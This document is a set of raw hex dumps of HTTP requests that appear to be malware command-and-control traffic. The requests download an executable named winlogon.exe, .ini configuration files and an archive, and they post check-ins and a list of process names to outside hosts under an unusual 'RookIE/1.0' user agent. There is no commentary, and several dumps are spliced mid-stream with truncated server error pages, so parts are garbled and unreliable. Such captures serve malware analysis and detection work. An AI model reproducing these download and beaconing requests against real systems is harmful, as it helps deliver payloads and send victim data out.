0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f78756b 652f7769 6e6c6f67   GET /xuke/winlog
0x00000010 (00016)   6f6e2e65 78652048 5454502f 312e310d   on.exe HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20777777   0727)..Host: www
0x000000b0 (00176)   2e616263 3738392e 696e666f 0d0a436f   .abc789.info..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f787878 342e696e   GET /sms/xxx4.in
0x00000010 (00016)   69204854 54502f31 2e310d0a 41636365   i HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 322e3736 35333231   ..Host: 2.765321
0x000000b0 (00176)   2e696e66 6f3a3433 32310d0a 436f6e6e   .info:4321..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a466f 756e643c 2f68313e   ve....Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f73656f 2f78786a 666c6473   GET /seo/xxjflds
0x00000010 (00016)   6a666c6a 31303030 362e7261 72204854   jflj10006.rar HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 526f6f6b 49452f31 2e300d0a   nt: RookIE/1.0..
0x00000040 (00064)   486f7374 3a203132 312e3132 2e313034   Host: 121.12.104
0x00000050 (00080)   2e32363a 31360d0a 0d0a                .26:16....

0x00000000 (00000)   47455420 2f736d73 2f787878 30312e69   GET /sms/xxx01.i
0x00000010 (00016)   6e692048 5454502f 312e310d 0a416363   ni HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x000000b0 (00176)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a6f 756e643c 2f68313e   ive....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f73656f 2f78786a 666c6473   GET /seo/xxjflds
0x00000010 (00016)   6a666c6a 31303030 362e7261 72204854   jflj10006.rar HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 526f6f6b 49452f31 2e300d0a   nt: RookIE/1.0..
0x00000040 (00064)   486f7374 3a203132 312e3132 2e313034   Host: 121.12.104
0x00000050 (00080)   2e32363a 31360d0a 0d0a                .26:16....

0x00000000 (00000)   47455420 2f736d73 2f787878 342e696e   GET /sms/xxx4.in
0x00000010 (00016)   69204854 54502f31 2e310d0a 41636365   i HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 322e3736 35333231   ..Host: 2.765321
0x000000b0 (00176)   2e696e66 6f3a3433 32310d0a 436f6e6e   .info:4321..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0a6f 756e643c 2f68313e   ve.....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f787878 30312e69   GET /sms/xxx01.i
0x00000010 (00016)   6e692048 5454502f 312e310d 0a416363   ni HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x000000b0 (00176)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a6f 756e643c 2f68313e   ive....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736d73 2f787878 342e696e   GET /sms/xxx4.in
0x00000010 (00016)   69204854 54502f31 2e310d0a 41636365   i HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 322e3736 35333231   ..Host: 2.765321
0x000000b0 (00176)   2e696e66 6f3a3433 32310d0a 436f6e6e   .info:4321..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a313b 20535631 3b202e4e   ve....1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a6e 642e3c2f 703e0a20   ive....nd.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736d73 2f787878 30312e69   GET /sms/xxx01.i
0x00000010 (00016)   6e692048 5454502f 312e310d 0a416363   ni HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x000000b0 (00176)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a3b 20535631 3b202e4e   ive....; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32345f 31343a35 303a3238 266d7367   -24_14:50:28&msg
0x00000040 (00064)   3d303137 30323833 30353234 30343726   =01702830524047&
0x00000050 (00080)   70617569 643d3131 32363731 31266679   pauid=1126711&fy
0x00000060 (00096)   3d312048 5454502f 312e310d 0a416363   =1 HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000080 (00128)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000090 (00144)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000a0 (00160)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000b0 (00176)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000c0 (00192)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000d0 (00208)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a5f 736c2e65 78653b73   ive...._sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
